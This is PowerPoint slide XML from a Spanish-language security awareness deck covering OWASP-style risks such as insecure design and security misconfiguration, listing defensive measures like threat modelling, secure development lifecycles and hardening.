        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7234C2A5-0EA2-6ABA-929B-AFBC9914BF6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2251158" y="2949778"/>
            <a:ext cx="545291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El diseño seguro garantiza que el código esté </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>diseñado y probado de manera sólida </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>para prevenir ataques conocidos.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rectangle 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26DF3405-2AE1-E971-7CD1-A98C781E2BC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2251158" y="4403494"/>
            <a:ext cx="5477047"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Un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>diseño inseguro no puede solucionarse con una implementación perfecta,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> ya que los controles de seguridad necesarios no se crearon en la fase previa.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Imagen 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12F0FF1A-A4D1-562B-BFEE-1AA4B4E0D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415" y="1625447"/>
            <a:ext cx="576258" cy="576258"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Imagen 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{765EBAC1-33E3-BD7E-7479-3CEFE6EF6B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842" y="4701855"/>
            <a:ext cx="576258" cy="576258"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Imagen 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62AE6065-A53A-0B2C-CF58-4B2A42B1E84D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="746027" y="2993298"/>
            <a:ext cx="707197" cy="725487"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Imagen 25" descr="Hombre en el aire durante salto con patineta&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76B6A735-4805-209B-8383-C47B89BDBB10}"/>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38762" t="3356" r="24067" b="9925"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8544314" y="1409533"/>
            <a:ext cx="3647686" cy="4423143"/>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F5240B72-C07E-A9C0-142C-DC9AEB6BB037}"/>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881456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1BF7E-E960-DF0D-F6D6-65BA72F578F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5C8331F-7CDE-2C42-0D92-A8186B92E4F7}"/>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E500525-31A2-EA21-48FA-5604D7F9C29E}"/>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04. Diseño Inseguro - Medidas</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B230CC4C-1824-94F0-A918-050AD8410B5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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B37CD740-3AA7-1E8E-B71B-75907DF3AC6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639192" y="4869041"/>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5" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1BD5B52-8F44-264C-EF0A-77E94150A2DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639192" y="1390872"/>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7" name="Oval 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FFDCD8B-98C2-1B5A-D742-79AD0D6ACB5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639192" y="316382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8" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDE70559-FCF9-FA20-81AC-3707E378CC1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1948124" y="1430077"/>
            <a:ext cx="5111330"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Emplear un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ciclo de Vida de Desarrollo Seguro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>con el fin de implementar controles relacionados con la seguridad.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DFD9D99-32BC-AF13-F848-B8C951EBFC32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1957649" y="3255973"/>
            <a:ext cx="5088806"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ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Emplear bibliotecas de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>patrones de diseño</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> seguro e integrar los </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>controles de seguridad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> en las historias de usuario.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB446EAB-C766-92B3-577D-F33A7446C8CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1948124" y="4978101"/>
            <a:ext cx="5111330"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Realizar un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>modelado</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> de amenazas y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pruebas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> unitarias y de integración.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{858663DD-FC81-C7FD-2E9F-41EABF8B0CE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="3255" r="21187" b="491"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7986480" y="1465523"/>
            <a:ext cx="4205520" cy="3871235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Graphic 10" descr="Blog contorno">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41487EC4-64C1-46D5-B415-EA63FDE792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680" y="3321506"/>
            <a:ext cx="790575" cy="790575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Graphic 16" descr="Libreta de direcciones contorno">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E6644E4-228C-437D-6010-07776CB7CD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680" y="5066293"/>
            <a:ext cx="714375" cy="714375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Imagen 13" descr="Dibujo en blanco y negro&#10;&#10;Descripción generada automáticamente con confianza baja">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2395651-79B3-A4FB-2334-E98598BB8C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842" y="1782006"/>
            <a:ext cx="609600" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Imagen 2" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75979A6D-8ABD-9591-87D5-CDDE0179F572}"/>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439656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0444-77DD-BB15-0F7A-EF00AFF3CEF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FCF3D54-D9D9-DAF3-F810-3B304934E34F}"/>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C28E5EB-BFF4-3D16-A34E-D9A291CF1D45}"/>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Incidentes de seguridad</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F45338C-0820-8C2E-BDDD-71C1C3E9264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93953E54-7547-7758-5A8A-9582C0A28081}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990621" y="1333128"/>
            <a:ext cx="9737666" cy="1446550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="864428" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“Si tu empresa gasta más en café que en seguridad TI, serás hackeado. Es más, merecerás ser hackeado.” - Bruce </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Schneier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="864428" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Un sistema tiene la seguridad de su eslabón más débil. Confiar en el usuario y un uso predecible o bien intencionado del sistema, es una mala idea.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="864428" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B060302020202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B31A865A-5B6E-7FE1-69AE-791EC7AB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241" y="2927761"/>
            <a:ext cx="2988544" cy="2988544"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Imagen 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{004ADFCB-1D4A-0519-C51F-BBF10F69145A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1657357" y="2928458"/>
            <a:ext cx="4548176" cy="2986909"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FF44BB8-A6A9-9980-EDFB-F65F46C9792F}"/>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147540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27883-FF63-C269-02AF-6F0CC3C3A55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29B0ED9-3508-79A6-9913-D3C95200DE57}"/>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49EE1E4-FCE3-D582-011B-5D373EBCB08A}"/>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05. Configuración de seguridad incorrecta</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99A9BEAA-F227-3DA3-16B8-941F02DC9AF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Shape 4978">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9ACA7EF1-0F59-57E4-AA78-00A522CCB16F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1731407" y="3304829"/>
            <a:ext cx="7189775" cy="830967"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
              <ma14:wrappingTextBoxFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" xmlns:lc="http://schemas.openxmlformats.org/drawingml/2006/lockedCanvas" xmlns="" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="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Falta de un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>endurecimiento de seguridad apropiado</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, instalación de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>características innecesarias</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>desactualizado o vulnerable</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3" name="Oval 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB5C1A6F-2CBE-2CF2-AF94-7A9CE1270F34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520933" y="4915715"/>
            <a:ext cx="900000" cy="9000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b="1">
              <a:latin typeface="Raleway" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 4978">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C42FE510-BA2F-0A48-21C8-792DC466E4E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1731409" y="1610230"/>
            <a:ext cx="7189774" cy="1028600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
              <ma14:wrappingTextBoxFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" xmlns:lc="http://schemas.openxmlformats.org/drawingml/2006/lockedCanvas" xmlns="" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="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Resultado de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>configuraciones inseguras </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>por defecto o ad hoc, cabeceras HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mal configuradas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, mensajes de error descriptivos que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>contienen información sensible, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>se habilitan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
